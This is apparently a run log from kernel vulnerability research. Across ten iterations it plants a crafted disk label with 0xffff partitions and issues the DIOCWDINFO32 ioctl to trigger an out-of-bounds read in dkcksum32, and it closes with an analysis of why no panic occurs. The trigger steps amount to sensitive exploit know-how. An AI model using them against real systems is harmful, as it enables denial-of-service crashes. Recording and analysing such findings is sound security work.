DF-0106 / run.log
=== iter 1 === [*] planted crafted label (d_npartitions=0xffff) at /dev/vn0 offset 512 [*] got valid virgin label from kernel (d_npartitions=16, d_secsize=512) [*] issuing DIOCWDINFO32 on /dev/vn0s0 -> writedisklabel reads crafted sector -> dkcksum32 OOB walk poc_writedisklabel: DIOCWDINFO32 returned (kernel NOT panicked): No such process: No such process rc=0 === iter 2 === [*] planted crafted label (d_npartitions=0xffff) at /dev/vn0 offset 512 [*] got valid virgin label from kernel (d_npartitions=16, d_secsize=512) [*] issuing DIOCWDINFO32 on /dev/vn0s0 -> writedisklabel reads crafted sector -> dkcksum32 OOB walk poc_writedisklabel: DIOCWDINFO32 returned (kernel NOT panicked): No such process: No such process rc=0 === iter 3 === [*] planted crafted label (d_npartitions=0xffff) at /dev/vn0 offset 512 [*] got valid virgin label from kernel (d_npartitions=16, d_secsize=512) [*] issuing DIOCWDINFO32 on /dev/vn0s0 -> writedisklabel reads crafted sector -> dkcksum32 OOB walk poc_writedisklabel: DIOCWDINFO32 returned (kernel NOT panicked): No such process: No such process rc=0 === iter 4 === [*] planted crafted label (d_npartitions=0xffff) at /dev/vn0 offset 512 [*] got valid virgin label from kernel (d_npartitions=16, d_secsize=512) [*] issuing DIOCWDINFO32 on /dev/vn0s0 -> writedisklabel reads crafted sector -> dkcksum32 OOB walk poc_writedisklabel: DIOCWDINFO32 returned (kernel NOT panicked): No such process: No such process rc=0 === iter 5 === [*] planted crafted label (d_npartitions=0xffff) at /dev/vn0 offset 512 [*] got valid virgin label from kernel (d_npartitions=16, d_secsize=512) [*] issuing DIOCWDINFO32 on /dev/vn0s0 -> writedisklabel reads crafted sector -> dkcksum32 OOB walk poc_writedisklabel: DIOCWDINFO32 returned (kernel NOT panicked): No such process: No such process rc=0 === iter 6 === [*] planted crafted label (d_npartitions=0xffff) at /dev/vn0 offset 512 [*] got valid virgin label from kernel (d_npartitions=16, d_secsize=512) [*] issuing DIOCWDINFO32 on /dev/vn0s0 -> writedisklabel reads crafted sector -> dkcksum32 OOB walk poc_writedisklabel: DIOCWDINFO32 returned (kernel NOT panicked): No such process: No such process rc=0 === iter 7 === [*] planted crafted label (d_npartitions=0xffff) at /dev/vn0 offset 512 [*] got valid virgin label from kernel (d_npartitions=16, d_secsize=512) [*] issuing DIOCWDINFO32 on /dev/vn0s0 -> writedisklabel reads crafted sector -> dkcksum32 OOB walk poc_writedisklabel: DIOCWDINFO32 returned (kernel NOT panicked): No such process: No such process rc=0 === iter 8 === [*] planted crafted label (d_npartitions=0xffff) at /dev/vn0 offset 512 [*] got valid virgin label from kernel (d_npartitions=16, d_secsize=512) [*] issuing DIOCWDINFO32 on /dev/vn0s0 -> writedisklabel reads crafted sector -> dkcksum32 OOB walk poc_writedisklabel: DIOCWDINFO32 returned (kernel NOT panicked): No such process: No such process rc=0 === iter 9 === [*] planted crafted label (d_npartitions=0xffff) at /dev/vn0 offset 512 [*] got valid virgin label from kernel (d_npartitions=16, d_secsize=512) [*] issuing DIOCWDINFO32 on /dev/vn0s0 -> writedisklabel reads crafted sector -> dkcksum32 OOB walk poc_writedisklabel: DIOCWDINFO32 returned (kernel NOT panicked): No such process: No such process rc=0 === iter 10 === [*] planted crafted label (d_npartitions=0xffff) at /dev/vn0 offset 512 [*] got valid virgin label from kernel (d_npartitions=16, d_secsize=512) [*] issuing DIOCWDINFO32 on /dev/vn0s0 -> writedisklabel reads crafted sector -> dkcksum32 OOB walk poc_writedisklabel: DIOCWDINFO32 returned (kernel NOT panicked): No such process: No such process rc=0 LOOP_DONE_NO_PANIC ----- OUTCOME: NO PANIC across 10 iterations (and 400+ in extended runs). ----- dkcksum32 DID execute on the writedisklabel path (the loop at subr_disklabel32.c:363-364 evaluates dkcksum32(dlp) at sector offset 0 where the crafted label's d_magic/d_magic2 match), but the 1MiB OOB walk stays within the ~24MiB contiguous wired getpbuf_mem region (swapbkva_mem) and does not fault. The missing-guard bug is confirmed in source; the identical root-cause panic is reproduced live via sibling DF-0107 (dkcksum32 from setdisklabel).